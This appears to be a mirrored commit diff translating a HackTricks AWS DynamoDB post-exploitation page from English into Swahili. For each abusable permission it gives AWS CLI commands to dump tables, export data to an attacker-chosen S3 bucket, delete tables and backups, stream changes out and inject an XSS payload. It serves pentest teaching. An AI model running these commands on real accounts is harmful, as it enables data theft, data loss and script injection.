gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-15 22:32:31 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:26:13 +00:00
parent 44da2ea78f
commit 6f74ac1a76
245 changed files with 9102 additions and 11816 deletions
Download Patch File Download Diff File Expand all files Collapse all files

286
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## DynamoDB
For more information check:
Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
### `dynamodb:BatchGetItem`
An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
Mshambuliaji mwenye ruhusa hii ataweza **kupata vitu kutoka kwa meza kwa ufunguo wa msingi** (huwezi tu kuomba data zote za meza). Hii inamaanisha kuwa unahitaji kujua funguo za msingi (unaweza kupata hii kwa kupata metadata ya meza (`describe-table`).
{{#tabs }}
{{#tab name="json file" }}
```bash
aws dynamodb batch-get-item --request-items file:///tmp/a.json
// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
}
```
{{#endtab }}
{{#tab name="inline" }}
```bash
aws dynamodb batch-get-item \
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:GetItem`
**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
**Kama ruhusa za awali** hii inamruhusu mshambuliaji mwenye uwezo kusoma thamani kutoka jedwali 1 tu kwa kutolewa kwa ufunguo wa msingi wa kipengee cha kupata:
```json
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json
// With a.json
{
"Id" : {
"N": "205"
"N": "205"
}
}
```
With this permission it's also possible to use the **`transact-get-items`** method like:
Na ruhusa hii, pia inawezekana kutumia njia ya **`transact-get-items`** kama:
```json
aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json
--transact-items file:///tmp/a.json
// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:Query`
**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
**Kama ruhusa za awali** hii inaruhusu mshambuliaji mwenye uwezo kusoma thamani kutoka jedwali 1 tu kwa kutumia ufunguo wa msingi wa kipengee kinachopaswa kupatikana. Inaruhusu kutumia [sehemu ya kulinganisha](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), lakini kulinganisha pekee linaloruhusiwa na ufunguo wa msingi (ambalo lazima lionekane) ni "EQ", hivyo huwezi kutumia kulinganisha kupata DB nzima katika ombi.
{{#tabs }}
{{#tab name="json file" }}
```bash
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
// With a.json
{
// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}
```
{{#endtab }}
{{#tab name="inline" }}
```bash
aws dynamodb query \
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:Scan`
You can use this permission to **dump the entire table easily**.
Unaweza kutumia ruhusa hii **kutoa jedwali zima kwa urahisi**.
```bash
aws dynamodb scan --table-name <t_name> #Get data inside the table
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:PartiQLSelect`
You can use this permission to **dump the entire table easily**.
Unaweza kutumia ruhusa hii **kutoa jedwali zima kwa urahisi**.
```bash
aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"
--statement "SELECT * FROM ProductCatalog"
```
This permission also allow to perform `batch-execute-statement` like:
Hii ruhusa pia inaruhusu kutekeleza `batch-execute-statement` kama:
```bash
aws dynamodb batch-execute-statement \
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
```
lakini unahitaji kubainisha ufunguo wa msingi na thamani, hivyo siyo faida sana.
but you need to specify the primary key with a value, so it isn't that useful.
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
Ruhusa hii itamruhusu mshambuliaji **kutoa jedwali lote kwenye kikasha cha S3** alichokichagua:
```bash
aws dynamodb export-table-to-point-in-time \
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>
```
Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
Kumbuka kwamba ili hii ifanye kazi, jedwali linahitaji kuwa na point-in-time-recovery iliyoanzishwa, unaweza kuangalia kama jedwali lina hiyo kwa:
```bash
aws dynamodb describe-continuous-backups \
--table-name <tablename>
--table-name <tablename>
```
If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
Ikiwa haijawashwa, utahitaji **kuwasha** na kwa hiyo unahitaji ruhusa **`dynamodb:ExportTableToPointInTime`**:
```bash
aws dynamodb update-continuous-backups \
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika jedwali
### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
Kwa ruhusa hizi, mshambuliaji angeweza **kuunda jedwali jipya kutoka kwa nakala ya akiba** (au hata kuunda nakala ya akiba ili kisha aifufue katika jedwali tofauti). Kisha, kwa ruhusa zinazohitajika, angeweza kuangalia **taarifa** kutoka kwa akiba ambazo haziwezi kuwa tena katika jedwali la uzalishaji.
```bash
aws dynamodb restore-table-from-backup \
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
**Madhara Yanayoweza Kutokea:** Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika nakala ya meza
### `dynamodb:PutItem`
This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
Ruhusa hii inawawezesha watumiaji kuongeza **kitu kipya kwenye meza au kubadilisha kitu kilichopo** na kitu kipya. Ikiwa kitu chenye ufunguo wa msingi sawa tayari kipo, **kitu chote kitabadilishwa** na kitu kipya. Ikiwa ufunguo wa msingi haupo, kitu kipya chenye ufunguo wa msingi ulioainishwa kitaundwa **.**
{{#tabs }}
{{#tab name="XSS Example" }}
```bash
## Create new item with XSS payload
aws dynamodb put-item --table <table_name> --item file://add.json
### With add.json:
{
"Id": {
"S": "1000"
},
"Name": {
"S": "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
"Id": {
"S": "1000"
},
"Name": {
"S": "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
}
```
{{#endtab }}
{{#tab name="AI Example" }}
```bash
aws dynamodb put-item \
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
**Madhara Yanayoweza Kutokea:** Ukatili wa udhaifu zaidi/kuvunjika kwa sheria kwa kuwa na uwezo wa kuongeza/kubadilisha data katika jedwali la DynamoDB
### `dynamodb:UpdateItem`
This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
Ruhusa hii inawaruhusu watumiaji **kubadilisha sifa zilizopo za kipengee au kuongeza sifa mpya kwa kipengee**. Haifanyi **mabadiliko** ya kipengee chote; inasasisha tu sifa zilizotajwa. Ikiwa funguo kuu haipo katika jedwali, operesheni itafanya **kuunda kipengee kipya** chenye funguo kuu iliyotajwa na kuweka sifa zilizotajwa katika muktadha wa sasisho.
{{#tabs }}
{{#tab name="XSS Example" }}
```bash
## Update item with XSS payload
aws dynamodb update-item --table <table_name> \
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
### With key.json:
{
"Id": {
"S": "1000"
}
"Id": {
"S": "1000"
}
}
### and val.json
{
":value": {
"S": "<script>alert(1)</script>"
}
":value": {
"S": "<script>alert(1)</script>"
}
}
```
{{#endtab }}
{{#tab name="AI Example" }}
```bash
aws dynamodb update-item \
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
**Madhara Yanayoweza Kutokea:** Kutumiwa kwa udhaifu/kuvunjwa zaidi kwa kuwa na uwezo wa kuongeza/kubadilisha data katika jedwali la DynamoDB
### `dynamodb:DeleteTable`
An attacker with this permission can **delete a DynamoDB table, causing data loss**.
Mshambuliaji mwenye ruhusa hii anaweza **kufuta jedwali la DynamoDB, na kusababisha kupoteza data**.
```bash
aws dynamodb delete-table \
--table-name TargetTable \
--region <region>
--table-name TargetTable \
--region <region>
```
**Potential impact**: Data loss and disruption of services relying on the deleted table.
**Madhara yanayoweza kutokea**: Kupoteza data na kuingiliwa kwa huduma zinazotegemea meza iliyofutwa.
### `dynamodb:DeleteBackup`
An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
Mshambuliaji mwenye ruhusa hii anaweza **kufuta nakala ya akiba ya DynamoDB, ambayo inaweza kusababisha kupoteza data katika hali ya kuokoa dharura**.
```bash
aws dynamodb delete-backup \
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>
```
**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.
**Madhara yanayoweza kutokea**: Kupoteza data na kutoweza kurejesha kutoka kwa nakala ya akiba wakati wa hali ya dharura ya urejeleaji.
### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
> [!NOTE]
> TODO: Test if this actually works
> TODO: Jaribu kama hii inafanya kazi
An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
1. Enable a stream on a DynamoDB table:
Mshambuliaji mwenye ruhusa hizi anaweza **kuwezesha mtiririko kwenye meza ya DynamoDB, kusasisha meza ili kuanza kutiririsha mabadiliko, na kisha kufikia mtiririko ili kufuatilia mabadiliko kwenye meza kwa wakati halisi**. Hii inamruhusu mshambuliaji kufuatilia na kuhamasisha mabadiliko ya data, ambayo yanaweza kusababisha uvujaji wa data.
1. Wezesha mtiririko kwenye meza ya DynamoDB:
```bash
bashCopy codeaws dynamodb update-table \
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>
```
2. Describe the stream to obtain the ARN and other details:
2. Eleza mchakato wa kupata ARN na maelezo mengine:
```bash
bashCopy codeaws dynamodb describe-stream \
--table-name TargetTable \
--region <region>
--table-name TargetTable \
--region <region>
```
3. Get the shard iterator using the stream ARN:
3. Pata iterator ya shard ukitumia ARN ya mtiririko:
```bash
bashCopy codeaws dynamodbstreams get-shard-iterator \
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>
```
4. Use the shard iterator to access and exfiltrate data from the stream:
4. Tumia iterator ya shard kufikia na kutoa data kutoka kwa mtiririko:
```bash
bashCopy codeaws dynamodbstreams get-records \
--shard-iterator <shard_iterator> \
--region <region>
--shard-iterator <shard_iterator> \
--region <region>
```
**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes.
**Madhara yanayoweza kutokea**: Ufuatiliaji wa wakati halisi na uvujaji wa data za mabadiliko ya jedwali la DynamoDB.
{{#include ../../../banners/hacktricks-training.md}}